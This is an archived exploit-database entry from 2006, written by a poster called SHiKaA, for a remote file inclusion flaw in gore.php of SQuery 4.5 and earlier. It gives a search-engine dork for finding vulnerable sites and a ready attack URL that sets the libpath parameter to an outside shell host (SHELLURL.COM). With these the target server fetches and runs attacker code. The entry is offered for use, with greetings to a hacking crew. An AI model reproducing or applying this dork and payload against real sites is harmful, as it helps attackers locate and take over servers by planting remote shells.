SQuery <= 4.5 gore.php Remote File Inclusion Vulnerability

2006-07-10T00:00:00
ID EDB-ID:2003
Type exploitdb
Reporter SHiKaA
Modified 2006-07-10T00:00:00

Description

SQuery <= 4.5 (gore.php) Remote File Inclusion Vulnerability. Webapps exploit for php platform

                                        
                                            ================================================================= 
SQuery &lt;= 4.5(libpath) Remote File Inclusion Exploit            
=================================================================
Worked On : ALL VERSIONS                                         |
                                                                 |
Critical Level : Dangerous                                       |
                                                                 |
Gug Found In : gore.php                                          |
=================================================================
Dork :  "SQuery 4.5" |"SQuery 4.0" |"SQuery 3.9" | inurl:"modules.php?name=SQuery"

http://sitename.com/SQuery/lib/gore.php?libpath=http://SHELLURL.COM?
===============================================================================
Discoverd By : SHiKaA
Conatact : SHiKaA-[at]hotmail.com

GreetZ :  BlAcK_BiRd  Kambaa  NANA METO7575 Gendiaaa Saw SnIpEr_Sa Masry OSA FEGLA Kosho-Man 3amer and #ALL MEMBER OF EL SLAM-CITY
=================================================================

# milw0rm.com [2006-07-10]